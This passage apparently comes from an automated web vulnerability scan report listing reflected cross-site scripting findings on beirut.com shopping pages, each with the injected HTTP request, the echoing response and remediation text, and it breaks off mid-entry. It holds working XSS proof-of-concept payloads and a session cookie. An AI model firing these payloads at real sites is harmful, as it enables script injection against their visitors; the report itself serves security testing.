Request

GET /Shopping/Clothing-Accessories/194367784/Accessories-for-Her/481711c'-alert(1)-'6d4db64a6fb HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:01:18 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55309

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories/194367784/Accessories-for-Her/481711c'-alert(1)-'6d4db64a6fb';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.767. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68187'-alert(1)-'78be639f950 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping68187'-alert(1)-'78be639f950/Clothing-Accessories/194367784/Accessories-for-Him/47 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:47:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping68187'-alert(1)-'78be639f950/Clothing-Accessories/194367784/Accessories-for-Him/47';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.768. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 969bf"><a>043e6c47744 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping969bf"><a>043e6c47744/Clothing-Accessories/194367784/Accessories-for-Him/47 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:35:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping969bf"><a>043e6c47744">
...[SNIP]...

4.769. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad78e'-alert(1)-'6ebc6ecb33b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessoriesad78e'-alert(1)-'6ebc6ecb33b/194367784/Accessories-for-Him/47 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:53:41 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessoriesad78e'-alert(1)-'6ebc6ecb33b/194367784/Accessories-for-Him/47';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.770. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3b417<script>alert(1)</script>9df11855083 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessories3b417<script>alert(1)</script>9df11855083/194367784/Accessories-for-Him/47 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:53:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessories3b417<script>alert(1)</script>9df11855083 <a href="#" id="backlink">
...[SNIP]...

4.771. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25b68'-alert(1)-'d2ba03cb1ea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/19436778425b68'-alert(1)-'d2ba03cb1ea/Accessories-for-Him/47 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:59:12 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Clothing-Accessories/19436778425b68'-alert(1)-'d2ba03cb1ea/Accessories-for-Him/47';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.772. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a5bb'-alert(1)-'d67b41b1a55 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784/Accessories-for-Him7a5bb'-alert(1)-'d67b41b1a55/47 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:05:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessories/194367784/Accessories-for-Him7a5bb'-alert(1)-'d67b41b1a55/47';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.773. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe3ac'-alert(1)-'b944c3d762d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47fe3ac'-alert(1)-'b944c3d762d HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:09:39 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47fe3ac'-alert(1)-'b944c3d762d';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.774. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories/37 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Accessories/37

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe301"><a>ba71952d450 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppingfe301"><a>ba71952d450/Clothing-Accessories/194367784/Accessories/37 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:52:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppingfe301"><a>ba71952d450">
...[SNIP]...

4.775. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories/37 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Accessories/37

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0382'-alert(1)-'1a305dea957 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shoppinga0382'-alert(1)-'1a305dea957/Clothing-Accessories/194367784/Accessories/37 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:04:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shoppinga0382'-alert(1)-'1a305dea957/Clothing-Accessories/194367784/Accessories/37';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.776. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories/37 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Accessories/37

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 36f96<script>alert(1)</script>ba10e1b3b0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessories36f96<script>alert(1)</script>ba10e1b3b0d/194367784/Accessories/37 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:12:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessories36f96<script>alert(1)</script>ba10e1b3b0d <a href="#" id="backlink">
...[SNIP]...

4.777. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories/37 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Accessories/37

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68673'-alert(1)-'ff6b4b93937 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories68673'-alert(1)-'ff6b4b93937/194367784/Accessories/37 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:11:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Clothing-Accessories68673'-alert(1)-'ff6b4b93937/194367784/Accessories/37';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.778. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories/37 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Accessories/37

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3235'-alert(1)-'e0a4dbc25ad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784d3235'-alert(1)-'e0a4dbc25ad/Accessories/37 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:16:05 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61536

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories/194367784d3235'-alert(1)-'e0a4dbc25ad/Accessories/37';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.779. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories/37 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Accessories/37

Issue detail

